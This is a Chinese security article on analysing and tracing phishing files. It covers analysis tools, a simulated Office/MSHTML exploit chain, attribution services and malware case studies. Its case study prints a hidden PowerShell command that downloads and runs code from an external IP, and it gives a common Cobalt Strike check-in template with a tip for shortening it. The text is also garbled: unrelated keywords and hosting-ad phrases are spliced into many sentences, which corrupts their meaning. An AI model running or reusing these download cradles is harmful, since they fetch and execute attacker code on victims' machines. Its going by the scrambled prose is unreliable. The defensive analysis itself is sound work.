钓鱼文件应急溯源:方法篇

 人参与 | 时间:2025-11-27 00:56:49

内容概览

wKg0C2UCozqAAY4AABsxd19Dmk459.png

背景

恶意软件分析技术的钓鱼市场

如今,恶意软件分析已是文件信息安全领域的一个整体产业:

发布保护产品的反病毒引擎实验室,高度专业化的应急专家小组,甚至恶意软件编写者本身也参与其中 ,溯源他们争夺一个潜在的钓鱼客户--"受害者"。

常见的文件分析技术

静态恶意软件分析

静态恶意软件分析在不主动运行恶意软件代码的情况下查找可能损害系统的文件 ,使其成为暴露恶意库或打包文件的应急安全工具 。香港云服务器静态恶意软件分析可以发现有关恶意软件性质的溯源线索 ,例如文件名、钓鱼哈希、文件IP 地址、应急域和文件头数据 。溯源可以使用各种工具(例如网络分析器)观察恶意软件。钓鱼

动态恶意软件分析

动态恶意软件分析使用沙盒 ,文件沙盒是应急一个安全、隔离的虚拟环境 ,您可以在其中运行可疑的危险代码。安全专业人员可以密切监视沙箱中的恶意软件 ,源码库而不必担心感染系统或网络的其余部分,从而使他们能够收集有关恶意软件的更多信息。

混合恶意软件分析

混合恶意软件分析结合了静态和动态技术 。例如  ,如果恶意代码对计算机的内存进行更改,则动态分析可以检测到该活动 。然后,静态分析可以准确确定进行了哪些更改 。

常见的检测工具展示

网络分析工具NetLimiter

官网 :https://www.netlimiter.com/

可通过此工具监测程序的网络通讯信息 ,以方便进一步分析

CurrPorts

官网 :https://www.nirsoft.net/utils/cports.html

可通过此工具显示本地计算机上所有当前打开的TCP/IP和UDP端口的高防服务器列表。对于列表中的每个端口,还显示打开该端口的进程的信息,包括进程名称 、进程的完整路径 、进程的版本信息(产品名称、文件描述等)、进程的创建时间以及创建该进程的用户。此外 ,模板下载CurrPorts允许你关闭不需要的TCP连接 ,杀死打开端口的进程,并将TCP/UDP端口信息保存到HTML文件 、XML文件或以制表符分隔的文本文件中 。

TeaPot

可通过此工具监测目标系统的DNS解析 ,可有效应用于对APT远控木马的检测  。

HTTPDebuger

官网:https://www.httpdebugger.com/

可通过此攻击http与https数据

行为监控工具DiffView

官网:https://www.adlice.com/diffview/

可通过此工具追踪一个程序在你系统上所做的修改或一些操作进行监控

火绒剑

官网 :https://www.huorong.cn/

可通过此工具在如下图所展示的角度分析程序运行后做了什么,以分析是否为恶意程序以及进行辅助分析工作

Comodo

可通过此工具的服务器租用HIPS与防火墙功能监测程序运行后做了什么 ,以进行分析

https://www.comodo.com/home/internet-security/free-internet-security.php

反编译与调试工具GDA 与Frida

http://www.gda.wiki:9090/

https://frida.re/

通过GDA与Frida来分析APK是否存在恶意行为

x64dbg

https://x64dbg.com/

可通过此工具深入分析程序的执行情况以及运行原理

知识扩展

思路

一个恶意软件分析思路图展示,如下图展示了三个编码级别

恶意软件作者 :使用高级语言编写恶意程序

计算机 :CPU识别代码进行执行

恶意软件分析人员:通过反编译手段进行分析

发包函数

针对软件的网络信息常针对底层运行原理 ,通过拦截发布函数进行分析

WSPSend函数在一个连接的套接字上发送数据 。

WSPSendTo函数使用重叠的I/O将数据发送到一个特定的目的地。

WSPRecv函数在一个套接字上接收数据 。

WSPRecvFrom函数接收一个数据报并存储源地址 。

漏洞利用类钓鱼

模拟

打开Word 发现有下载连接

模拟恶意行为打开了计算器

真实背景利用案例

该漏洞存在于MSHTML,即Internet Explorer的亿华云引擎。虽然现在很少有人使用IE(甚至微软也强烈建议改用其较新的浏览器Edge) ,但这个旧的浏览器仍然是现代操作系统的一个组成部分  ,而且其他一些程序也使用其引擎来处理网络内容。特别是,微软的Office应用程序,如Word和PowerPoint,都依赖它 。

钓鱼邮件示例

自该漏洞发布以来,安全研究人员在Twitter上警告说 ,尽管微软Office的 “保护视图 ”功能会阻止该漏洞 ,但这是多么危险 。当Office打开一个文档时,它会检查它是否被标记为 “网络标记”(MoTW) ,这意味着它来自于互联网。如果这个标签存在,微软将以只读模式打开文档 ,有效地阻止了该漏洞 ,除非用户点击 “启用编辑 ”按钮。

但历史表明,许多用户忽略了这一警告,还是点击了 "启用编辑 "按钮 。

但还有有许多方法可以使文件不收到MoTW标志 ,从而有效地否定了这种防御。

模拟分析网络分析示例

发起程序-

WINWORD.EXE *64位

请求地址-

http://192.168.86.144/http://192.168.86.144/word.cab

解析 :cab是windows的压缩格式

wKg0C2UCpBOAAnAACszVAwzY204.png

行为监控分析示例

正常  :就是打开一个word文档

可疑 :调用了控制面板程序control.exe

并通过控制面板执行临时文件夹下名为msword.inf配置文件 ,之后通过运行cmd程序打开计算器程序calc.exe(这里代指恶意程序)

wKg0C2UCpBqAX0yYAACy0bR8oQU988.png

解包查看

wKg0C2UCpCWASqn1AADlwxzrz2w111.png

wKg0C2UCpCuAPWqDAAEhQTbZ1Gg436.png

结合之前网络分析访问此地址后跳转下载可疑文件

下载分析

wKg0C2UCpDOAaFCoAABuP491kv4431.png

wKg0C2UCpECARy4iAABGHprY5UY440.png

通过control(控制面板)程序运行msword.inf脚本

INF文件中包含硬件设备的信息或脚本以控制硬件操作。

解析

wKg0C2UCpEiAH5afAABMcu2mAl4626.png

看到了计算器相关内容(calc.exe 这里代指恶意程序)

反汇编定位

wKg0C2UCpEAAYfZAADRWQyZQn0617.png

关键函数运行完毕,恶意程序已成功加载

wKg0C2UCpFaAawSxAACxyeLetA860.png

进入查看(已加载恶意配置文件)

wKg0C2UCpF2AY0TuAADg88tJ1w099.png

ShellExecuteExW函数(可通常此函数执行外部程序或打开文件)

wKg0C2UCpGWAeYGvAADAxenDwq8165.png

rundll32.exe(rundll32.exe用于在内存中运行DLL文件 ,

它们会在应用程序中被使用,可用于在内存中执行恶意dll)

wKg0C2UCpGuACTvAACiY3WsNCM021.png

栈回溯

执行参数

溯源

常根据分析的数据如IP 、MD5、签名等等通过一些方法深入定位制作者

常用的一些工具

埃文

https://www.ipplus360.com/

可通过此工具进行IP定位

BestTrace

https://www.ipip.net/product/client.html

IP归属快速查询

备案、Whois、威胁情报查询系统

https://beian.miit.gov.cn/#/Integrated/index

https://whois.aliyun.com/

https://ti.qianxin.com/

https://s.threatbook.com/

https://tix.qq.com/

https://ti.sangfor.com.cn/analysis-platform

判断

后缀名与显示的logo

wKg0C2UCpHiAWZOaAACBAeosvbI241.png

如图所示显示的是常见pdf logo但实际是可执行文件

文件类型

wKg0C2UCpIGAN4kcAACGGuKnsek601.png

如图所示,通过一些方法使其后缀名看起来正常 ,但实际是可执行文件,此类可通过属性文件类型信息查看

hash

例如 ,假设你有20个来源不明的文件,你能够使用它们的MD5值在virscan、Virustotal之类的查杀网站进行对比来识别它们的安全度

https://www.virscan.org/

https://www.virustotal.com/

wKg0C2UCpIqAFYfWAABQja2oo266.png

wKg0C2UCpJKAYrQAAAvJEQZj4g394.png

时间戳

wKg0C2UCpJqAH7wQAABe5Jyll6Q722.png

wKg0C2UCpKOAOMTlAABQ0RzElgM913.png

如图所示 编译日期与版本信息差别过大

邮件信息

wKg0C2UCpK6AJX7wAACHhXSeUxI677.png

发件人与所属单位对比

打开判断

wKg0C2UCpLWAH5ejAADQKzvyBg460.png

执行恶意宏代码,在TEMP目录释放XLS文件

然后通过WMIC启动恶意XLS文件

专业工具

https://github.com/emalderson/ThePhish

钓鱼邮件分析系统

wKg0C2UCpLyAfUSSAACr2DUczPk018.png

扫描

http://www.starwoodd.net/

wKg0C2UCpMOAWZ2bAACT9MJBhMw582.png

代码分析

wKg0C2UCpMmAXBB9AAB5hy3fik762.png

分析其具体行为与作用对比

快捷方式

wKg0C2UCpNKAfoMSAABT0BDfiU740.png

wKg0C2UCpNqAJN9zAAAsbfMTY8861.png

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(http://120.48.85.228/favicon’))”

常见的cs上线命令

wKg0C2UHQaATkUmAABj7lFl9QM176.jpg

powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(‘’)

powershell上线命令可以简化 ,删除了两个括号和两个双引号

案例讲解

快捷方式

网上找的样本进行分析 ,如下图所示,解包内容存在欺骗诱导行为

wKg0C2UCpUOAai7RAADjtqMdF3k591.png

wKg0C2UCpVWAQtePAADM51FXPVE648.png

标题诱导

查看属性与解混混淆发现为恶意程序

wKg0C2UCpVuAGoHRAAErr9pPmwY177.png

wKg0C2UCpWmAWcoHAADHTYKABpE234.png

wKg0C2UCpXSAfk7AACFYfU5sA637.png

执行监控

打开文档后发现有外联与执行程序行为

wKg0C2UCpXyAcCzkAAC8DGYjCUM619.png

wKg0C2UCpYKACSR1AAC6gUvxvTs600.png

网上分析示例

属性查看

在PEstudio中检查样本的属性,恶意软件被打包,所有的字符串都被加密了

wKg0C2UCpYqAWs3eAADpknAlA8I598.png

反编译逐步分析

wKg0C2UCpZGAVgV7AABfmtwT5EM947.png

获取进程的名称,接着解密一些字符串,并将其中的两个字符串连接起来创建 EXE 文件的名称。

wKg0C2UCpaOAcMQfAACPV9S5YQ248.png

防止恶意程序自我感染的过程中 ,恶意软件会将进程的完整路径与解析的应用程序进行比较  。如果它们相同 ,恶意软件将返回并结束此功能

wKg0C2UCpamAXtswAAB08gwZk591.png

遍历信息

wKg0C2UCpaAfXCuAAE0hTbgpdA195.png

c2

wKg0C2UCpbeAZryyAADd358EcgY202.png

内容过多这里不展示了,下图是总结与查杀规则

wKg0C2UCpb2AWEcAAAEnyMS6Do539.png

查杀

扫描查杀思路图

不同的环境不同的思路

wKg0C2UCpcWAHfZ6AACeMe8u8Y4701.png

专业扫描工具

wKg0C2UCpcyAQQIhAACHbCkIhlw653.png

弱点扫描

用户帐户控制 (UAC) 有助于防止恶意软件损坏电脑  ,并且有助于组织部署易于管理的桌面 。 借助 UAC,应用和任务将始终在非管理员帐户的安全上下文中运行 ,除非管理员专门授予管理员级别的访问系统权限 。 UAC 可阻止自动安装未经授权的应用并防止意外更改系统设置 。

wKg0C2UCpdAWLk9AACCKpAdzB0224.png

总结

对于文件

wKg0C2UCpeaAe3xJAACRsQ93HA179.png

内存层防护与监控

针对攻击的多样化建议在内存层进行防护与监控,目前国内安芯网盾这方面看到过相关资料

wKg0C2UCpe2AY40kAADWjv9EE30836.png

本文作者 :SecIN技术社区, 转载请注明来自FreeBuf.COM

顶: 92踩: 1584